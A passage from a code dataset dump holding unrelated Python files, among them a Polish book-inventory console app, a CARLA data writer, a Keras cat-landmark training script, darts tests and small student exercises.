\r\n data.to_excel(\"MagazynKsiazek.xlsx\")\r\n Komunikat(\"Pomyslnie dodano ksiązkę\")\r\n except:\r\n Komunikat(\"ZAMKNIJ DOKUMENT A NASTĘPNIE POWTÓRZ ZADANIE!\")\r\n\r\n\r\ndef UsunPozycje(data):\r\n PokazPozycje(data)\r\n wybor=input(\"Podaj id ksiązki którą chcesz usunąć: \")\r\n wybor1=input(\"Czy na pewno chcesz usunąć książkę o ID=\"+wybor+\" Wpisz t lub n: \")\r\n if(wybor1==\"t\"):\r\n data=data.drop([int(wybor)])\r\n data=data.reset_index(drop=True)\r\n try: \r\n data.to_excel(\"MagazynKsiazek.xlsx\")\r\n Komunikat(\"Pomyslnie usunięto ksiązkę!\")\r\n except:\r\n Komunikat(\"ZAMKNIJ DOKUMENT A NASTĘPNIE POWTÓRZ ZADANIE!\")\r\n \r\n else:\r\n Komunikat(\"Nie usunięto ksiązki!\")\r\n\r\ndef EdytujPozycje(data):\r\n PokazPozycje(data)\r\n wybor=input(\"Podaj id ksiązki którą chcesz zedytować: \")\r\n print(\"Podaj nowe dane:\")\r\n tytul=input(\"Tytuł: \")\r\n autor=input(\"Autor: \")\r\n wydawnictwo=input(\"Wydawnictwo: \")\r\n ilosc_stron=input(\"Ilość stron: \")\r\n rok_wydania=input(\"Rok wydania: \")\r\n data.loc[int(wybor),'Tytuł']=tytul\r\n data.loc[int(wybor),'Autor']=autor\r\n data.loc[int(wybor),'Wydawnictwo']=wydawnictwo\r\n data.loc[int(wybor),'Ilość stron']=ilosc_stron\r\n data.loc[int(wybor),'Rok wydania']=rok_wydania\r\n wybor1=input(\"Czy na pewno chcesz zedytować wybraną pozycję? Wpisz t lub n: \")\r\n if(wybor1==\"t\"):\r\n try:\r\n data.to_excel(\"MagazynKsiazek.xlsx\")\r\n Komunikat(\"Pomyslnie zedytowano pozycję!\")\r\n except:\r\n Komunikat(\"ZAMKNIJ DOKUMENT A NASTĘPNIE POWTÓRZ ZADANIE!\")\r\n else:\r\n Komunikat(\"Anulowano edytowanie pozycji!\")\r\n\r\ndef Menu():\r\n print(\"1. Dodaj pozycję\\n2. Usuń pozycję\\n3. Pokaż wszystkie pozycje\\n4. Edytuj pozycję\\n5. 
Wyjdź z programu\")\r\n\r\n\r\nwhile 1:\r\n    Menu()\r\n    wybor=input(\"Wybierz: \")\r\n    if(wybor == \"1\"):\r\n        dane=WczytajDane()\r\n        DodajPozycje(dane)\r\n    elif(wybor==\"2\"):\r\n        dane=WczytajDane()\r\n        UsunPozycje(dane)\r\n    elif(wybor == \"3\"):\r\n        dane=WczytajDane()\r\n        PokazPozycje(dane)\r\n    elif(wybor==\"4\"):\r\n        dane=WczytajDane()\r\n        EdytujPozycje(dane)\r\n    elif(wybor==\"5\"):\r\n        input(\"Wcisnij \\\"enter\\\" żeby kontynuować\")\r\n        break\r\n    else:\r\n        print(\"Zły wybór!\")\r\n","sub_path":"EdytaZylinskaInformatyka/Biblioteka_projekt.py","file_name":"Biblioteka_projekt.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"490534604","text":"monIntRate = annualInterestRate / 12\nupdBalance = balance\nmonLowBound = updBalance / 12\nmonUppBound = (updBalance * (1 + monIntRate) ** 12) / 12\n\nwhile round(updBalance, 2) != 0:\n    updBalance = balance\n    monFixPay = (monLowBound + monUppBound) / 2\n    for i in range(12):\n        monUnpBal = updBalance - monFixPay\n        updBalance = monUnpBal + monIntRate * monUnpBal\n    if updBalance > 0:\n        monLowBound = monFixPay\n    elif updBalance < 0:\n        monUppBound = monFixPay\n\nprint(\"Lowest Payment:\", round(monFixPay, 2))","sub_path":"Week 2/Problem Set 2/Problem 3.py","file_name":"Problem 3.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"285024579","text":"from tkinter import *\n\nn=int(0)\n\ndef slt():\n    global n\n    n+=1\n    lab1.config(text=n) \n\ndef slt2():\n    global n\n    n-=1\n    lab1.config(text=n)\n\nwindow=Tk()\nwindow.title(\"windo1\")\nwindow.geometry(\"555x555+100+100\")\nwindow.config(bg=\"#6677ff\")\n\nlab1=Label(window,text=n,width=12,height=3,bg=\"#555500\")\nlab1.pack() # pack the widget into the window\n\nbtn1=Button(window,text=\"add\",command=slt,bg=\"#00AA00\")\nbtn1.pack()\nbtn2=Button(window,text=\"sub\",command=slt2)\nbtn2.pack()\n\nbtnexit=Button(window,text=\"exit\",command=window.destroy)\nbtnexit.pack()\n\nwindow.mainloop()","sub_path":"a1.py","file_name":"a1.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"416126213","text":"import os\nimport json\nimport shutil\n\nimport numpy  # needed by write_lidar_data below (numpy.concatenate)\n\nfrom google.protobuf.json_format import MessageToJson, MessageToDict\nfrom PIL import Image as PImage\n\ndef write_image_data(data, filename, format,\n                     top_crop, bottom_crop, resize_width, resize_height):\n\n    image = PImage.frombytes(mode='RGBA',\n                             size=(data.width, data.height),\n                             data=data.raw_data,\n                             decoder_name='raw')\n    color = image.split()\n    image = PImage.merge(\"RGB\", color[2::-1])\n    width, height = image.size\n    \n    if not (width == resize_width and height == resize_height):\n        image = image.crop( (0, top_crop, width, height - bottom_crop) )\n        image = image.resize( (resize_width, resize_height) )\n\n    if not filename.endswith(format):\n        filename += format\n    \n    folder = os.path.dirname(filename)\n    if not os.path.isdir(folder):\n        os.makedirs(folder)\n    image.save(filename, quality=100)\n\n\ndef write_lidar_data(data, filename, format):\n\n    if not filename.endswith(format):\n        filename += format\n\n    point_cloud = data.point_cloud\n\n    def construct_ply_header():\n        \"\"\"Generates a PLY header given a total number of 3D points and\n        coloring property if specified\n        \"\"\"\n        points = len(point_cloud) # Total point number\n        header = ['ply',\n                  'format ascii 1.0',\n                  'element vertex {}',\n                  'property float32 x',\n                  'property 
float32 y',\n 'property float32 z',\n 'property uchar diffuse_red',\n 'property uchar diffuse_green',\n 'property uchar diffuse_blue',\n 'end_header']\n if not point_cloud._has_colors:\n return '\\n'.join(header[0:6] + [header[-1]]).format(points)\n return '\\n'.join(header).format(points)\n\n if not point_cloud._has_colors:\n ply = '\\n'.join(['{:.2f} {:.2f} {:.2f}'.format(\n *p) for p in point_cloud._array.tolist()])\n else:\n points_3d = numpy.concatenate(\n (point_cloud._array, point_cloud._color_array), axis=1)\n ply = '\\n'.join(['{:.2f} {:.2f} {:.2f} {:.0f} {:.0f} {:.0f}'\n .format(*p) for p in points_3d.tolist()])\n\n # Create folder to save if does not exist.\n folder = os.path.dirname(filename)\n if not os.path.isdir(folder):\n os.makedirs(folder)\n\n # Open the file and save with the specific PLY format.\n with open(filename, 'w+') as ply_file:\n ply_file.write('\\n'.join([construct_ply_header(), ply]))\n\n\ndef write_json_measurements(episode_path, data_point_id, measurements, control, control_noise,\n state):\n\n with open(os.path.join(episode_path, 'measurements_' + data_point_id.zfill(5) + '.json'), 'w') as fo:\n\n jsonObj = MessageToDict(measurements)\n jsonObj.update(state)\n jsonObj.update({'steer': control.steer})\n jsonObj.update({'throttle': control.throttle})\n jsonObj.update({'brake': control.brake})\n jsonObj.update({'hand_brake': control.hand_brake})\n jsonObj.update({'reverse': control.reverse})\n jsonObj.update({'steer_noise': control_noise.steer})\n jsonObj.update({'throttle_noise': control_noise.throttle})\n jsonObj.update({'brake_noise': control_noise.brake})\n\n fo.write(json.dumps(jsonObj, sort_keys=True, indent=4))\n\n\ndef write_sensor_data(episode_path, data_point_id, sensor_data, sensors_frequency,\n top_crop, bottom_crop, resize_width, resize_height):\n # try:\n # from PIL import Image as PImage\n # except ImportError:\n # raise RuntimeError(\n # 'cannot import PIL, make sure pillow package is installed')\n\n for name, data in sensor_data.items():\n if int(data_point_id) % int((1/sensors_frequency[name])) == 0:\n filename = os.path.join(episode_path, name + '_' + data_point_id.zfill(5))\n if 'Lidar' in name:\n format = '.ply'\n write_lidar_data(data, filename, format)\n else:\n format = '.png'\n write_image_data(data, filename, format,\n top_crop, bottom_crop, resize_width, resize_height)\n \n # data.save_to_disk(os.path.join(episode_path, name + '_' + data_point_id.zfill(5)), format)\n\n\ndef make_dataset_path(dataset_path):\n if not os.path.exists(dataset_path):\n os.makedirs(dataset_path)\n\n\ndef add_metadata(dataset_path, settings_module):\n with open(os.path.join(dataset_path, 'metadata.json'), 'w') as fo:\n jsonObj = {}\n jsonObj.update(settings_module.sensors_yaw)\n jsonObj.update({'fov': settings_module.FOV})\n jsonObj.update({'width': settings_module.WINDOW_WIDTH})\n jsonObj.update({'height': settings_module.WINDOW_HEIGHT})\n jsonObj.update({'lateral_noise_percentage': settings_module.lat_noise_percent})\n jsonObj.update({'longitudinal_noise_percentage': settings_module.long_noise_percent})\n jsonObj.update({'car range': settings_module.NumberOfVehicles})\n jsonObj.update({'pedestrian range': settings_module.NumberOfPedestrians})\n jsonObj.update({'set_of_weathers': settings_module.set_of_weathers})\n fo.write(json.dumps(jsonObj, sort_keys=True, indent=4))\n\ndef add_episode_metadata(dataset_path, episode_number, episode_aspects):\n\n if not os.path.exists(os.path.join(dataset_path, 'episode_' + episode_number)):\n 
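# Create the episode folder on first use; os.makedirs(..., exist_ok=True) would be a more robust alternative for nested paths.\n        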
os.mkdir(os.path.join(dataset_path, 'episode_' + episode_number))\n\n with open(os.path.join(dataset_path, 'episode_' + episode_number, 'metadata.json'), 'w') as fo:\n\n jsonObj = {}\n jsonObj.update({'town_name': episode_aspects['town_name']})\n jsonObj.update({'number_of_pedestrian': episode_aspects['number_of_pedestrians']})\n jsonObj.update({'number_of_vehicles': episode_aspects['number_of_vehicles']})\n jsonObj.update({'seeds_pedestrians': episode_aspects['seeds_pedestrians']})\n jsonObj.update({'seeds_vehicles': episode_aspects['seeds_vehicles']})\n jsonObj.update({'weather': episode_aspects['weather']})\n \n poses_str = str(episode_aspects['pose']) \n start_transform_str = str(episode_aspects['player_start_transform']).replace('\\n', '')\n target_transform_str = str(episode_aspects['player_target_transform']).replace('\\n', '')\n \n jsonObj.update({'pose': poses_str })\n jsonObj.update({'player_start_transform': start_transform_str })\n jsonObj.update({'player_target_transform': target_transform_str })\n fo.write(json.dumps(jsonObj, sort_keys=True, indent=4))\n\n\n\ndef add_data_point(measurements, control, control_noise, sensor_data, state,\n dataset_path, episode_number, data_point_id, sensors_frequency,\n top_crop, bottom_crop, resize_width, resize_height):\n\n episode_path = os.path.join(dataset_path, 'episode_' + episode_number)\n if not os.path.exists(os.path.join(dataset_path, 'episode_' + episode_number)):\n os.mkdir(os.path.join(dataset_path, 'episode_' + episode_number))\n write_sensor_data(episode_path, data_point_id, sensor_data, sensors_frequency,\n top_crop, bottom_crop, resize_width, resize_height)\n write_json_measurements(episode_path, data_point_id, measurements, control, control_noise,\n state)\n\n# Delete an episode in the case\ndef delete_episode(dataset_path, episode_number):\n\n shutil.rmtree(os.path.join(dataset_path, 'episode_' + episode_number))","sub_path":"modules/data_writer.py","file_name":"data_writer.py","file_ext":"py","file_size_in_byte":7613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"204713069","text":"from channels.auth import AuthMiddlewareStack\nfrom channels.routing import ProtocolTypeRouter, URLRouter, ChannelNameRouter\n\nfrom django.urls import path, re_path\nfrom cronjob.consumers import DagStatusConsumer, RemoteTailfLogConsumer, LocalTailfLogConsumer\n\napplication = ProtocolTypeRouter({\n 'websocket': AuthMiddlewareStack(\n URLRouter([\n re_path(r'^ws/dagstatus/$', DagStatusConsumer),\n re_path(r'^ws/remotelog/(?P\\S+)/$', RemoteTailfLogConsumer),\n re_path(r'^ws/locallog/(?P\\S+)/$', LocalTailfLogConsumer)\n ])\n ),\n \"channel\": ChannelNameRouter({\n \"remote-log\": RemoteTailfLogConsumer,\n \"local-log\": LocalTailfLogConsumer,\n\n })\n})\n","sub_path":"autocronjob/routing.py","file_name":"routing.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"587374672","text":"import shutil\nimport logging\n\nfrom .base_test_class import DartsBaseTestClass\nfrom ..utils import timeseries_generation as tg\nfrom ..logging import get_logger\n\nlogger = get_logger(__name__)\n\ntry:\n from ..models.nbeats import NBEATSModel\n TORCH_AVAILABLE = True\nexcept ImportError:\n logger.warning('Torch not available. 
NBEATS tests will be skipped.')\n    TORCH_AVAILABLE = False\n\n\nif TORCH_AVAILABLE:\n    class NBEATSModelTestCase(DartsBaseTestClass):\n\n        def test_creation(self):\n            with self.assertRaises(ValueError):\n                # if a list is passed to the `layer_widths` argument, it must have a length equal to `num_stacks`\n                NBEATSModel(input_chunk_length=1, output_chunk_length=1, num_stacks=3, layer_widths=[1, 2])\n\n        def test_fit(self):\n            large_ts = tg.constant_timeseries(length=100, value=1000)\n            small_ts = tg.constant_timeseries(length=100, value=10)\n\n            # Test basic fit and predict\n            model = NBEATSModel(input_chunk_length=1, output_chunk_length=1, n_epochs=10,\n                                num_stacks=1, num_blocks=1, layer_widths=20)\n            model.fit(large_ts[:98])\n            pred = model.predict(n=2).values()[0]\n\n            # Test whether model trained on one series is better than one trained on another\n            model2 = NBEATSModel(input_chunk_length=1, output_chunk_length=1,\n                                 n_epochs=10, num_stacks=1, num_blocks=1, layer_widths=20)\n            model2.fit(small_ts[:98])\n            pred2 = model2.predict(n=2).values()[0]\n            self.assertTrue(abs(pred2 - 10) < abs(pred - 10))\n\n            # test short predict\n            pred3 = model2.predict(n=1)\n            self.assertEqual(len(pred3), 1)\n\n        def test_multivariate(self):\n            series_multivariate = tg.linear_timeseries(length=100).stack(tg.linear_timeseries(length=100))\n            model = NBEATSModel(input_chunk_length=1, output_chunk_length=1,\n                                n_epochs=10, num_stacks=1, num_blocks=1, layer_widths=20)\n            with self.assertRaises(ValueError):\n                model.fit(series_multivariate)\n","sub_path":"darts/tests/test_NBEATS.py","file_name":"test_NBEATS.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"575491278","text":"#This file was created by Wayne Dreyer\r\nimport numpy as np \r\n#import DataObject as DataObject\r\n\r\n#Calculates the mean and standard deviation of light intensity in the given image data\r\n\r\n#Takes in a data object, gets the image array from that object and returns the array's mean as a float\r\ndef meanBrightness(obj):\r\n    imageData = obj.getImageData()\r\n    data16 = imageData.astype(np.int16) #don't know why prototype code converts data to int16, need to look at output data of dataobject.imagedata()\r\n    imageMean = np.mean(data16)\r\n    return imageMean\r\n\r\n\r\n#Takes in a data object, gets the image array from that object and returns the array's standard deviation as a float\r\ndef stdBrightness(obj):\r\n    imageData = obj.getImageData()\r\n    data16 = imageData.astype(np.int16) #Same as above, converted to int16, awaiting completion of dataobject to view imagedata\r\n    imageStd = np.std(data16)\r\n    return imageStd\r\n","sub_path":"ImageIntensity.py","file_name":"ImageIntensity.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"405687160","text":"__author__ = 'packet-racket'\n\n'''\nOrganize the calls to each zipcode so that the calls all return a multiple of 5 total results.\nThis includes only calling the minimum number of zipcodes to scan each store. 
Each zipcode\ncan return results for stores in different zipcodes, so it's possible to mix and match which zipcodes\nare called, even excluding some, in order to achieve this.\n\nThis is incomplete for now.\n'''\n\n","sub_path":"Strategies/OptimalZipcode_Strategy.py","file_name":"OptimalZipcode_Strategy.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"170379421","text":"import keras, datetime\nfrom keras.layers import Input, Dense\nfrom keras.models import Model\nfrom keras.callbacks import TensorBoard, ModelCheckpoint, ReduceLROnPlateau\nfrom keras.applications import mobilenet_v2\nimport numpy as np\n\nimg_size = 224\n# The format of landmarks are 2 * 9, [x-cord][y-cord] * 9 of them.\noutput_size = 18\n\n# For log\nstart = datetime.datetime.now().strftime('%Y_%m_%d_%H_%M_%S')\n\n# Error detection: 'Object arrays cannot be loaded when allow_pickle=False'\n# Preserve the original np.load\n# and set the 'allow_pickle' as True\ntmp_np_load = np.load\nnp.load = lambda *a,**k: tmp_np_load(*a, allow_pickle=True, **k)\n\n# Load .npy datasets\nprint('Loading datasets...')\ndata_00 = np.load('/Users/lim/Desktop/CatHisterizer/dataset/lmks_CAT_00.npy')\ndata_01 = np.load('/Users/lim/Desktop/CatHisterizer/dataset/lmks_CAT_01.npy')\ndata_02 = np.load('/Users/lim/Desktop/CatHisterizer/dataset/lmks_CAT_02.npy')\ndata_03 = np.load('/Users/lim/Desktop/CatHisterizer/dataset/lmks_CAT_03.npy')\ndata_04 = np.load('/Users/lim/Desktop/CatHisterizer/dataset/lmks_CAT_04.npy')\ndata_05 = np.load('/Users/lim/Desktop/CatHisterizer/dataset/lmks_CAT_05.npy')\ndata_06 = np.load('/Users/lim/Desktop/CatHisterizer/dataset/lmks_CAT_06.npy')\nprint('Data loading finished')\n\n# Read the datasets\n# In this exercise, dataset_00 to 05 are assigned for training and only 06 for validation\nprint('Reading datasets...')\nx_train = np.concatenate((data_00.item().get('imgs'),\n data_01.item().get('imgs'),\n data_02.item().get('imgs'),\n data_03.item().get('imgs'),\n data_04.item().get('imgs'),\n data_05.item().get('imgs')), axis = 0)\ny_train = np.concatenate((data_00.item().get('lmks'),\n data_01.item().get('lmks'),\n data_02.item().get('lmks'),\n data_03.item().get('lmks'),\n data_04.item().get('lmks'),\n data_05.item().get('lmks')), axis = 0)\nprint('Data reading finished.')\n\n# Start building the model\nprint('Building models...')\nx_test = np.array(data_06.item().get('imgs'))\ny_test = np.array(data_06.item().get('lmks'))\n\nx_train = x_train.astype('float32') / 255.\nx_test = x_test.astype('float32') / 255.\nx_train = np.reshape(x_train, (-1, img_size, img_size, 3))\nx_test = np.reshape(x_test, (-1, img_size, img_size, 3))\n\ny_train = np.reshape(y_train, (-1, output_size))\ny_test = np.reshape(y_test, (-1, output_size))\n\ninputs = Input(shape=(img_size, img_size, 3))\n\n# Pretrained model\nmobilenet_model = mobilenet_v2.MobileNetV2(input_shape=(img_size, img_size, 3),\n alpha=1.0,\n include_top=False,\n weights='imagenet',\n input_tensor=inputs,\n pooling='max')\n\nnet = Dense(128, activation='relu')(mobilenet_model.layers[-1].output)\nnet = Dense(64, activation='relu')(net)\nnet = Dense(output_size, activation='linear')(net)\n\nmodel = Model(inputs=inputs, outputs=net)\n\nmodel.summary()\nprint('Building finished.')\n\n# Start training\nprint('Training models...')\nmodel.compile(optimizer=keras.optimizers.Adam(), loss='mse')\n\nmodel.fit(x_train, y_train,\n epochs=50,\n batch_size=32,\n shuffle=True,\n 
validation_data=(x_test, y_test),\n          verbose=1,\n          callbacks=[\n            TensorBoard(log_dir='/Users/lim/Desktop/CatHisterizer/logs/%s' % (start)),\n            ModelCheckpoint('/Users/lim/Desktop/CatHisterizer/models/%s.h5' % (start), monitor='val_loss', verbose=1, save_best_only=True, mode='auto'),\n            ReduceLROnPlateau(monitor='val_loss', factor=0.2, patience=5, verbose=1, mode='auto')\n          ]\n          )\nprint('Training finished.')\n","sub_path":"secondTraining.py","file_name":"secondTraining.py","file_ext":"py","file_size_in_byte":3893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"520060067","text":"\"\"\"KT2 (R10).\"\"\"\n\n\ndef switch_lasts_and_firsts(s: str) -> str:\n    \"\"\"\n    Move last two characters to the beginning of string and first two characters to the end of string.\n\n    When string length is smaller than 4, return reversed string.\n\n    switch_lasts_and_firsts(\"ambulance\") => \"cebulanam\"\n    switch_lasts_and_firsts(\"firetruck\") => \"ckretrufi\"\n    switch_lasts_and_firsts(\"car\") => \"rac\"\n\n    :param s:\n    :return: modified string\n    \"\"\"\n    if len(s) < 4:\n        return s[::-1]\n    else:\n        new_s = s[-2] + s[-1] + s[2:-2] + s[:2]\n        return new_s\n\n\ndef has_seven(nums):\n    \"\"\"\n    Given a list of ints, return True if the value 7 appears in the list exactly 3 times and no consecutive elements have the same value.\n\n    has_seven([1, 2, 3]) => False\n    has_seven([7, 1, 7, 7]) => False\n    has_seven([7, 1, 7, 1, 7]) => True\n    has_seven([7, 1, 7, 1, 1, 7]) => False\n    \"\"\"\n    if nums.count(7) != 3:\n        return False\n    # no two consecutive elements may share the same value\n    for i in range(len(nums) - 1):\n        if nums[i] == nums[i + 1]:\n            return False\n    return True\n\n\ndef g_happy(s):\n    \"\"\"\n    We'll say that a lowercase 'g' in a string is \"happy\" if there is another 'g' immediately to its left or right.\n\n    Return True if all the g's in the given string are happy.\n\n    g_happy(\"xxggxx\") => True\n    g_happy(\"xxgxx\") => False\n    g_happy(\"xxggyygxx\") => False\n    \"\"\"\n    for i in range(len(s)):\n        if s[i] == \"g\":\n            left_is_g = i > 0 and s[i - 1] == \"g\"\n            right_is_g = i < len(s) - 1 and s[i + 1] == \"g\"\n            if not (left_is_g or right_is_g):\n                return False\n    return True\n","sub_path":"kt2/exam.py","file_name":"exam.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"643365867","text":"# -*- coding: utf-8 -*-\nimport re\nfrom datetime import datetime\nimport pytz\nfrom tzwhere import tzwhere\nfrom dateutil import tz\nfrom bs4 import BeautifulSoup\nimport requests\nimport urllib\nimport json\n\ndef dms2dd(dms):\n    \"\"\"(str) -> tuple of float\n    Convert coordinates in degrees, minutes, seconds to decimal; returns a tuple of two numbers: lat and lng\"\"\"\n    \n    coords = dms.split(\" \")[:2]\n    l = []\n\n    for i in coords:\n        i = i.strip()\n        \n        # get degree, minutes, seconds, direction\n        parts = re.split(\"[°′″]+\", i)\n        parts[-1] = parts[-1][0]\n        dd = float(parts[0]) + float(parts[1])/60 + float(parts[2])/(60*60)\n        if parts[3] == \"W\" or parts[3] == \"S\":\n            dd = dd*-1\n        l.append(dd)\n\n    \n    return (l[0], l[1])\n\n\ndef sun(location_in_dd):\n    \"\"\"(tuple of float) -> tuple of datetime object\n    Takes a tuple of decimal coordinates; returns a tuple of the local time now (at the radio station), sunrise, and sunset.\"\"\"\n    \n    rise_set = requests.get(\"https://api.sunrise-sunset.org/json?lat=\" + str(location_in_dd[0]) \\\n                            + \"&lng=\" 
+ str(location_in_dd[1]) + \"&date=today&formatted=0\")\n\n \n soup = BeautifulSoup(rise_set.content, \"html.parser\")\n\n #use json to decode json file from API to a dict\n result = json.loads(str(soup))\n \n sunrise = result[\"results\"][\"sunrise\"]\n sunset = result[\"results\"][\"sunset\"]\n sunrise = sunrise[:10] + \" \" + sunrise[11:19]\n sunset = sunset[:10] + \" \" + sunset[11:19]\n \n # get time zone and local time\n time_zone = tzwhere.tzwhere().tzNameAt(location_in_dd[0], location_in_dd[1])\n from_zone = tz.gettz(\"UTC\")\n to_zone = tz.gettz(time_zone)\n\n now = datetime.now(to_zone).time()\n\n rise_utc = datetime.strptime(sunrise, \"%Y-%m-%d %H:%M:%S\")\n rise_local = rise_utc.replace(tzinfo=from_zone).astimezone(to_zone).time()\n \n set_utc = datetime.strptime(sunset, \"%Y-%m-%d %H:%M:%S\")\n set_local = set_utc.replace(tzinfo=from_zone).astimezone(to_zone).time()\n\n result = (now, rise_local, set_local)\n\n return result\n \n","sub_path":"get_info.py","file_name":"get_info.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"627654241","text":"import io\nfrom io import BytesIO\n\nimport requests\nfrom PIL import Image\n\nfrom apps.bot.classes.Demotivator import DemotivatorBuilder\nfrom apps.bot.classes.Exceptions import PWarning\nfrom apps.bot.classes.common.CommonCommand import CommonCommand\nfrom apps.bot.classes.common.CommonMethods import get_attachments_from_attachments_or_fwd\n\n\nclass Demotivator(CommonCommand):\n name = \"демотиватор\"\n help_text = \"создаёт демотиватор\"\n help_texts = [\n \"(Изображения/Пересылаемое сообщение с изображением) (большой текст)[;маленький текст] - создаёт демотиватор\\n\"\n \"Разделитель текста ;\"\n ]\n args = 1\n attachments = ['photo']\n\n def start(self):\n image = get_attachments_from_attachments_or_fwd(self.event, 'photo')[0]\n\n texts = list(map(str.strip, self.event.original_args.split(';')))\n if not texts[0]:\n return \"Первая фраза обязательно должна быть\"\n\n if 'content' in image:\n base_image = Image.open(BytesIO(image['content']))\n elif 'private_download_url' in image:\n response = requests.get(image['private_download_url'])\n base_image = Image.open(BytesIO(response.content))\n else:\n raise PWarning(\"Нет картинки в сообщении\")\n\n db = DemotivatorBuilder(base_image, *texts)\n demotivator = db.get_demotivator()\n img_byte_arr = io.BytesIO()\n demotivator.save(img_byte_arr, format=\"PNG\")\n\n attachments = self.bot.upload_photos(img_byte_arr)\n return {\"attachments\": attachments}\n","sub_path":"apps/bot/commands/Demotivator.py","file_name":"Demotivator.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"570413644","text":"import sys\nimport handler\nimport cleaner\nimport pandas as pd\n\nif __name__ == \"__main__\":\n if (len(sys.argv) < 2):\n print(\"USAGE:\")\n print(sys.argv[0] + \" file1.json [file2.json...]\")\n sys.exit(84)\n questions = handler.getListQuestions(sys.argv[1:], cleaner.softClean)\n histogram = pd.Series(questions).value_counts()\n\n # print(histogram)\n print(\"-------------- BEST30 --------------\")\n print(histogram[:30])\n sys.exit(0)\n","sub_path":"scripting/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"277123231","text":"\"Question3 -A\"\n\n\ndef maximum(liste):\n 
maxi = liste[-1]\n for n in liste:\n if n > maxi:\n maxi = n\n return maxi\n\n\nprint(maximum([11, 1, 20, 101, 50, 3, 7, 100, 25]))\n\n\"QUESTION 3 -B\"\n\n\n#\ndef chaines():\n sentences = str(input(\"please enter the word or sentences in uppercase:\"))\n sentences = sentences.upper()\n print(sentences.lower())\n\n\"EXMPLE 2\"\npp=\"MASDJDSJNDJDNFEFNSJSCDNSDCOSDNCSDCNJNWDLCN\"\n\ndef p():\n for i in pp :\n print(pp.lower())\n\np()\n\n\"QUESTION 3-D\"\ndef liste():\n responde = int(input(\"enter the number that ypu want make the liste :\"))\n a = [1, 100, 6, 40, 21, 45, responde]\n print(a)\n print(\"do you want to continuos\")\n b = str(input(\"press no to stop or press ys to continuos\"))\n if b==\"yes\":\n #\n #\n responde = int(input(\"enter the number that ypu want make the liste :\"))\n # # a = []\n # # print(a)\n # # print(\"do you want to continuos\")\n # # b = str(input(\"press no to stop or press yes to continuos\"))\n # responde = int(input(\"enter the number that you want make the liste :\"))\n # a1 = []\n # a1.append(responde)\n # c=a+a1\n #\n # print(c)\n # else:\n # if b==\"no\":\n # print('thank you ')\n\n\nliste()\n","sub_path":"DSA WEEK1/Question3.py","file_name":"Question3.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"646110780","text":"###############################################################################\n# _*_ coding: utf-8\nimport json\n\nimport datetime\n\nfrom dateutil.relativedelta import relativedelta\nfrom django.core.management.base import BaseCommand\nfrom django.utils import six\n\nfrom tunga_utils import hubspot_utils\nfrom tunga_utils.models import ExternalEvent\nfrom tunga_utils.notifications.slack import notify_hubspot_deal_changes_slack\n\n\nclass Command(BaseCommand):\n\n def handle(self, *args, **options):\n \"\"\"\n Tunga Notify HubSpot events\n \"\"\"\n # command to run: python manage.py tunga_notify_hubspot_events\n last_12_hours = datetime.datetime.utcnow() - relativedelta(hours=50)\n events = ExternalEvent.objects.filter(notification_sent_at__isnull=True, created_at__gte=last_12_hours)\n\n deal_event_changes = dict()\n deal_event_ids = dict()\n\n for event in events:\n payload = json.loads(event.payload)\n for event_details in type(payload) is list and payload or [payload]:\n subscription_type = event_details.get(hubspot_utils.KEY_SUBSCRIPTION_TYPE)\n if subscription_type in [\n hubspot_utils.KEY_VALUE_DEAL_CREATED,\n hubspot_utils.KEY_VALUE_DEAL_DELETION,\n hubspot_utils.KEY_VALUE_DEAL_PROPERTY_CHANGE\n ]:\n deal_id = event_details.get(hubspot_utils.KEY_OBJECT_ID)\n\n existing_deal_event_ids = deal_event_ids.get(deal_id, [])\n existing_deal_event_payloads = deal_event_changes.get(deal_id, [])\n\n if event.id not in existing_deal_event_ids:\n existing_deal_event_ids.append(event.id)\n existing_deal_event_payloads.append(event_details)\n\n deal_event_ids[deal_id] = existing_deal_event_ids\n deal_event_changes[deal_id] = existing_deal_event_payloads\n\n for deal_id, changes in six.iteritems(deal_event_changes):\n notify_hubspot_deal_changes_slack.delay(deal_id, changes, deal_event_ids.get(deal_id, []))\n","sub_path":"tunga_utils/management/commands/tunga_notify_hubspot_events.py","file_name":"tunga_notify_hubspot_events.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"26078695","text":"\n\nimport pygame # Librería de pygame\nfrom random 
